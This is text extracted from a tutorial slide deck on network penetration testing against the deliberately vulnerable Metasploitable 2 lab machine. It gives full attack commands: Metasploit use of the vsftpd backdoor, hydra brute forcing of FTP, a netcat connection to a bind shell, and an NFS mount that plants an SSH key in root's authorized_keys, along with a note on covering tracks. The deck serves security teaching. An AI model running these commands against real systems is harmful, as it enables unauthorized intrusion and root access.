The Slides deck contains Network penetration testing requirements & Tools used in real world pentesting. For Demo purposes, I had used a vulnhub machine called Metasploitable 2 for testing purposes. Looking into various Ports and Services Vulnerabilities using Kali open source tools.

1. Network Penetration Testing

2. Agenda
Network Penetration Testing
• Information gathering
• Port scanning with Nmap
• Vulnerability Assessment with Nessus & OpenVas
• Exploiting Network Services & Web Vulnerabilities
• Privilege Escalation
• Password Cracking with John the Ripper & Hash cat
• Clearing the tracks

3. Information gathering
• Information gathering requires careful planning, research, and most
importantly, the ability to think like an attacker. At this step, you will attempt to
collect as much information about the target environment as possible.
• There are two types of information gathering: passive and active.
1) Passive information gathering
• Using passive information gathering, you can discover information about targets without
touching their systems.
2) Active information gathering
• In active information gathering, we interact directly with a system to learn more about it.
We might conduct port scans for open ports on the target or conduct scans to determine
what services are running. Each system or running service that we discover gives us another
opportunity for exploitation.
• But beware If you get careless while active information gathering, you might be nabbed by an
IDS or intrusion prevention system (IPS).

4. Information gathering (Contd.)

5. Information Gathering in Metasploitable 2
• Since our vulnerable machine running in same network, we can run
netdiscover command to check the IP address of Metasploitable 2
Machine

6. Port Scanning with Nmap
• Nmap is a network scanner created by Gordon Lyon.
• Nmap is used to discover hosts and services on a computer network by
sending packets and analyzing the responses.
• Nmap provides a number of features for probing computer networks,
including host discovery and service and operating system detection
• Nmap is a command-line network scanner used to detect hosts and
services.
• Zenmap is a GUI version of Nmap.
• Nmap can be used by hackers to gain access to uncontrolled ports on a
system. All a hacker would need to do to successfully get into a targeted
system would be to run Nmap on that system, look for vulnerabilities, and
figure out how to exploit them.

7. Port Scanning with Nmap (Contd.)
• Target Specification
• Nmap Scan Techniques
• Host Discovery
• Port Specification
• Service and Version Detection
• OS Detection
• Timing and Performance
• Timing and Performance Switches
• NSE Scripts
• Useful NSE Script Examples
• Firewall / IDS Evasion and Spoofing
• Miscellaneous Nmap Flags
Reference link: https://www.stationx.net/nmap-cheat-sheet/

8. Port Scanning with Nmap (Contd.)
• nmap -p- -sV TargetIP (Scanning for open ports & Service version
details)

9. Port Scanning with Nmap (Contd.)
• nmap --script vuln -p- TargetIP (Kind of vulnerability Scan)

10. Vulnerability Assessment with Nessus
In Nessus scanner Interface
• 1) Click on New Scan
• 2) Choose the Scan templates
• 3) I'm choosing Advanced Scan - Scan template
• 4) In Basic -> General -> Give some name & Targets
• 5) In Discovery -> Disable Ping
• 6) In Port Scan -> give Port scan range from 0-65535
• 7) If you have credentials provide the same - depends on operating system
• For Windows authentication -> choose windows
• For Linux authentication -> choose SSH
• 8) In plugins section -> Disable Denial of Service
• 9) Launch the scan
• 10) View the results
• 11) Export the reports as HTML, PDF, CSV Formats

11. Vulnerability Assessment with Nessus(Contd.)
See the results difference between Unauthenticated & Authenticated scans

12. Exploiting Network Services & Web Vulnerabilities
FTP – Port 21
• The File Transfer Protocol (FTP) is a standard communication protocol
used for the transfer of computer files from a server to a client on a
computer network.
• FTP is built on a client–server model architecture using separate
control and data connections between the client and the server.
• Usage:
• In Kali terminal - Use FTP Command connect to FTP Server – FTP TargetIP

13. Exploiting VSFTPD 2.3.4
• Use Searchsploit to find the relevant exploit for vulnerable software
versions

14. Exploiting VSFTPD 2.3.4 (Contd.)
• msf > use exploit/unix/ftp/vsftpd_234_backdoor
• msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost TargetIP
• msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit

15. Brute forcing FTP Login
• hydra -L user.txt -P pass.txt TargetIP ftp

16. Exploiting Port 22 - SSH
SSH – Port 22
• The Secure Shell Protocol is a cryptographic network protocol for
operating network services securely over an unsecured network.
• Its most notable applications are remote login and command-line
execution.
• SSH applications are based on a client–server architecture,
connecting an SSH client instance with an SSH server.
• Usage:
• Ssh root@TargetIP

17. Exploiting Port 22 - SSH (Contd.)

18. Exploiting port 23 - TELNET
TELNET – Port 23
• Telnet is an application protocol used on the Internet or local area
network to provide a bidirectional interactive text-oriented
communication facility using a virtual terminal connection.
• TELNET is commonly used by terminal emulation programs that
allow you to log into a remote host. However, TELNET can also be
used for terminal-to-terminal communication and interprocess
communication. TELNET is also used by other protocols (for example,
FTP) for establishing a protocol control channel.
• Usage: Telnet TargetIP TargetPort

19. Exploiting port 23 - TELNET (Contd.)

20. Exploiting port 23 - TELNET (Credential
Capture)

21. Exploiting port 23 - TELNET (Contd.)

22. Exploiting Port 25 - SMTP
• SMTP – Port 25
• The Simple Mail Transfer Protocol is an Internet standard communication
protocol for electronic mail transmission.
• Mail servers and other message transfer agents use SMTP to send and
receive mail messages.
• The client who wants to send the mail opens a TCP connection to the
SMTP server and then sends the mail across the connection. The SMTP
server is an always-on listening mode.
• As soon as it listens for a TCP connection from any client, the SMTP
process initiates a connection through port 25. After successfully
establishing a TCP connection the client process sends the mail instantly.

23. Exploiting Port 25 - SMTP (Contd.)
• smtp-user-enum -M VRFY -U user.txt -t TargetIP

24. Exploiting Port 80 HTTP
• Port 80 is the port number assigned to commonly used internet
communication protocol, Hypertext Transfer Protocol (HTTP).
• It is the default network port used to send and receive unencrypted
web pages.
• Visit http://metasploitable2IP
• Check for hidden directories & files in webserver

25. Exploiting Port 80 HTTP (Contd.)

26. Exploiting Port 80 HTTP (Contd.)

27. Exploiting Port 139 & 445
• SMB is a network file sharing protocol that requires an open port on
a computer or server to communicate with other systems. SMB
ports are generally port numbers 139 and 445.
• Port 139 is used by SMB dialects that communicate over NetBIOS. It
operates as an application layer network protocol for device
communication in Windows operating systems over a network. For
example, printers and serials ports communicate via Port 139.
• Port 445 is used by newer versions of SMB (after Windows 2000) on
top of a TCP stack, allowing SMB to communicate over the Internet.
This also means you can use IP addresses in order to use SMB like file
sharing.

28. Exploiting Port 139 & 445 (Contd.)
• Early versions of the SMB protocol were exploited during the WannaCry
ransomware attack through a zero-day exploit called Eternal Blue.
• WannaCry exploited legacy versions of Windows computers that used an
outdated version of the SMB protocol.
• WannaCry is a network worm with a transport mechanism designed to
spread itself automatically. The transport code scans for systems
vulnerable to the Eternal Blue exploit and then installs Double Pulsar, a
backdoor tool, and executes a copy of itself.
• It will then initiate an SMBv1 connection to the device and use buffer
overflow to take control of the system and install the ransomware
component of the attack.

29. Exploiting Port 139 & 445 (Contd.)

30. Exploiting Port 5432 - Postgres
• PostgreSQL is used for Adaptive Authentication (TCP).
• Port 5432 is opened for the Postgres database used in the Behavioral
Analytics feature of PCS.
• While scanning, customers may raise queries on 5432 Port as this
port is enabled on the internal interface. However, an attacker
cannot connect to it
• On some default Linux installations of PostgreSQL, the Postgres
service account may write to the /tmp directory and may source
UDF Shared Libraries from there as well, allowing execution of
arbitrary code

31. Exploiting Port 5432 – Postgres (Contd.)

32. Exploiting Port 6667 - UnrealIRCD
• UnrealIRCd is an open-source IRC daemon, originally based on
DreamForge, and is available for Unix-like operating systems and
Windows.
• Once users are connected to an IRC server, they can converse with
other users connected to any server in the IRC network
• IRC provides for group communication, via named channels, as well as
personal communication through “private” messages.
• UnrealIRCD backdoor - The remote IRC server is a version of
UnrealIRCD with a backdoor that allows an attacker to execute
arbitrary code on the affected host.

33. Exploiting Port 6667 - UnrealIRCD

34. Exploiting Port 36255 - distcc
• Distcc (Daemon Command Execution) is designed to speed up
compilation by taking advantage of unused processing power on
other computers.
• A machine with distcc installed can send code to be compiled across
the network to a computer which has the distccd daemon and a
compatible compiler installed.
• distcc works as an agent for the compiler.

35. Exploiting Port 36255 – distcc (Contd.)

36. Remote Login Exploitation
• A remote login is a tool that was used before ssh came into the
picture. Since we have the login credentials for Metasploitable 2, we
will be using Rlogin to connect to it, using the “-l” flag to define the
login name. (rlogin -l msfadmin TargetIP)

37. Remote Shell Exploitation
• Remote shell Protocol is another way to gain a remote shell, it is a
legitimate service that we will use to access the target machine with
login credentials to run a certain command (rsh -l msfadmin TargetIP
ifconfig)

38. Exploiting Distributed Ruby (8787)
• Distributed Ruby, also known as dRuby, or DRb, is a distributed object
system for the Ruby programming language that allows for remote
method calls between Ruby processes, even if they are on different
machines. It uses its own protocol and is written entirely in pure
Ruby.
• This makes for a flexible service that developers can use to enhance
certain programs, but it also opens up a security flaw when not
properly implemented, such as in older versions of dRuby.
• Since this is typically used for smaller projects and novice programs,
there usually isn't a lot of concern for security issues.

39. Exploiting Distributed Ruby (8787)

40. Bind shell Exploitation – Port 1524
• Metasploitable 2 comes with an open bind shell service running on
port 1524. We will be using Netcat to connect to it.
• nc TargetIP 1524

41. Exploiting Port 5900 - VNC
• Virtual Network Computing is a graphical desktop-sharing system
that uses the Remote Frame Buffer protocol to remotely control
another computer.
• It transmits the keyboard and mouse input from one computer to
another, relaying the graphical-screen updates, over a network.
• This service can be exploited using a module in Metasploit to find
the login credentials.

42. Exploiting Port 5900 – VNC (Contd.)

43. Exploiting Port 8180 - Apache Tomcat
• Apache Tomcat is a free and open-source implementation of the
Jakarta Servlet, Jakarta Expression Language, and Web Socket
technologies.
• It provides a "pure Java" HTTP web server environment in which Java
code can also run.
• Thus it's a Java web application server, although not a full JEE
application server

44. Exploiting Port 8180 - Apache Tomcat (Contd.)

45. Exploiting Port 3306 - MYSQL
• The MySQL database in Metasploitable 2 has negligible security, we
will connect to it using the MySQL function of Kali by defining the
username and host IP. The password will be left blank.

46. Exploiting Web Vulnerabilities

47. Privilege Escalation via Port 2049: NFS
• In this method, we will be creating an ssh key without a passphrase and
exchanging it with the ssh key of the victim machine for the root user.
• We use ssh-keygen to generate an RSA keypair without a key phrase, then
we place it in the “/root/.ssh” folder where the key is found by default.
Once the key is created and placed, we will create a directory
“/tmp/sshkey/” in our local machine.
• We will be mounting the directory we just made on the victim machine
using the Network File Sharing Function. Once mounted we write the key
from our machine to the victim’s machine, a sort of an override, using the
cat command. The thing to keep in mind here is that the key we have is
without a passphrase so the after the override the key in the victim
machine is also without a passphrase, so when it is connected using ssh,
it’s using a blank password.

48. Privilege Escalation via Port 2049: NFS
(Contd.)
• showmount -e TargetIP
• ssh-keygen
• mkdir /tmp/sshkey
• mount -t nfs TargetIP:/ /tmp/sshkey/
• cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/.ssh/authorized_keys
• umount /tmp/sshkey
• ssh root@TargetIP

49. Password Cracking with JTR & Hashcat
• John the Ripper is a free password cracking software tool. Originally
developed for the Unix operating system, it can run on fifteen
different platforms.
• Hashcat is a password recovery tool. It is a open source software.
Examples of Hashcat-supported hashing algorithms are LM hashes,
MD4, MD5, SHA-family and Unix Crypt formats
• Example Hashes:
https://hashcat.net/wiki/doku.php?id=example_hashes

50. Clearing the tracks
• The final phase of every successful hacking attack is clearing the
tracks.
• It is very important, after gaining access and misusing the network,
that the attacker cover the tracks to avoid being traced and caught.

51. THANK YOU !